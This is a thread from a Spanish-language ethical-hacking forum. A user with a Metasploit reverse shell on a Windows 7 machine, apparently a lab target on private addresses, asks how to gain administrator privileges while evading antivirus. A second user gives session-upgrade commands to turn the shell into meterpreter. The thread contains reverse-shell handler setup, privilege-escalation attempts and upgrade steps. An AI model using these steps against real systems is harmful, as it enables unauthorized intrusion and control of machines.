Shell de windows - escalar privilegios de administrador

Temas de hacking ético y ciberseguridad en general. Por favor lea [Necesita Registrarse o Iniciar Sesión para ver el enlace] para que conozca todo sobre nosotros. Invita a otros miembros al foro, también puedes unirte al chat con este enlace: [Necesita Registrarse o Iniciar Sesión para ver el enlace].

Nota: Publique aquí lo que no esté en las demás categorías.
RxB2019
Mensajes: 9
Registrado: Dom Ene 20, 2019 9:34 pm

Shell de windows - escalar privilegios de administrador

Mensaje por RxB2019 » Sab Abr 06, 2019 4:28 am

Buenas noches,

Estoy trabado y no se como solucionarlo. Obtuve una shell de windows (windows7 SP1) pero la misma no tiene privilegios de administrador y por lo tanto no puedo hacer demasiado, no me funciona ni el comando ftp. . El payload que utilicé es el siguiente:

msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp.

No utilicé meterpreter ya que me lo detecta el antivirus.

Muestro el resultado de la shell:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run

Started reverse TCP handler on 192.168.1.9:8080
Command shell session 1 opened (192.168.1.9:8080 -> 192.168.1.4:49179) at 2019-04-05 23:06:51 -0400


Microsoft Windows [Versi?n 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. Reservados todos los derechos.

C:\Windows>

Alguna sugerencia para esclarar privilegios?
Probé con múltiples exploit pero en todos dice que la sesión podría no ser compatible:

msf5 exploit(windows/local/bypassuac) > exploit -j

Exploit running as background job 0.
Exploit completed, but no session was created.
[!] SESSION may not be compatible with this module.

Alguien puede orientarme? Gracias!!!!

Avatar de Usuario
edu4rdshl
Mensajes: 25
Registrado: Sab Nov 17, 2018 8:06 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por edu4rdshl » Sab Abr 06, 2019 5:26 pm

Hola, cual es la salida de este comando en la sesion meterpreter:

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

meterpreter> run  post/windows/gather/win_privs
Security Hack Labs founder, BlackArch Linux developer.

RxB2019
Mensajes: 9
Registrado: Dom Ene 20, 2019 9:34 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por RxB2019 » Sab Abr 06, 2019 5:38 pm

El payload no es meterpreter, es windows/x64/shell_reverse_tcp.

Avatar de Usuario
edu4rdshl
Mensajes: 25
Registrado: Sab Nov 17, 2018 8:06 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por edu4rdshl » Sab Abr 06, 2019 6:31 pm

Obtuve una shell de windows (windows7 SP1)
Usted escribió eso, si no tiene una shell meterpreter entonces no diga que tiene una shell.
Security Hack Labs founder, BlackArch Linux developer.

RxB2019
Mensajes: 9
Registrado: Dom Ene 20, 2019 9:34 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por RxB2019 » Sab Abr 06, 2019 8:05 pm

Digo que conseguí una shell porque así se llama el payload y esa es la respuesta que da al conseguir la conexión: Command shell session 1 opened . Pero dicha sesión no es meterpreter! Intenté utilizar el módulo shell_to_meterpreter pero no funcionó tampoco!

Avatar de Usuario
edu4rdshl
Mensajes: 25
Registrado: Sab Nov 17, 2018 8:06 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por edu4rdshl » Sab Abr 06, 2019 8:58 pm

Una vez aparezca el mensaje "Command shell session 1 opened ." ejecute:

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

sessions -l
Le aparecerá una lista donde está la sesión con un número, supongamos que es la 1, entonces ejecute

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

sessions -i 1
Y tendrá su meterpreter.
Security Hack Labs founder, BlackArch Linux developer.

RxB2019
Mensajes: 9
Registrado: Dom Ene 20, 2019 9:34 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por RxB2019 » Sab Abr 06, 2019 9:27 pm

Gracias por su respuesta pero eso no funcionó! El payload que generé no fué para abrir una sesión meterpreter (porque el antivirus lo bloquea). Es un payload para abrir cmd. Pero la consola que obtengo no tiene permisos de administrador. Intenté ejecutar otros exploit de metasploit para escalar privilegios pero todos son para utilizar con una shell meterpreter. Tal vez el antivirus bloquee todos los intentos que hago! Y hasta ahí llegan mis conocimientos!

Avatar de Usuario
edu4rdshl
Mensajes: 25
Registrado: Sab Nov 17, 2018 8:06 pm

Re: Shell de windows - escalar privilegios de administrador

Mensaje por edu4rdshl » Sab Abr 06, 2019 9:59 pm

Ahhh ok ok, entiendo. ¿Cómo intentó con shell_reverse_tcp?

Los pasos a seguir son:

1. Iniciar la shell inversa.
2. CTRL + Z # Para mandar la shell a background.
3. Liste las sesiones.
4. Si por ejemplo, la sesión es la 1, utilice el comando

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

sessions -u 1
5. Una vez finalice, utilice el comando

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

sessions -i 2
, en este caso siempre va un número mayor al anterior debido a que lo que hace es abrir una nueva sesión meterpreter, es decir, si la sesión anterior era 2, esta vez será 3.
Security Hack Labs founder, BlackArch Linux developer.

Volver a “General”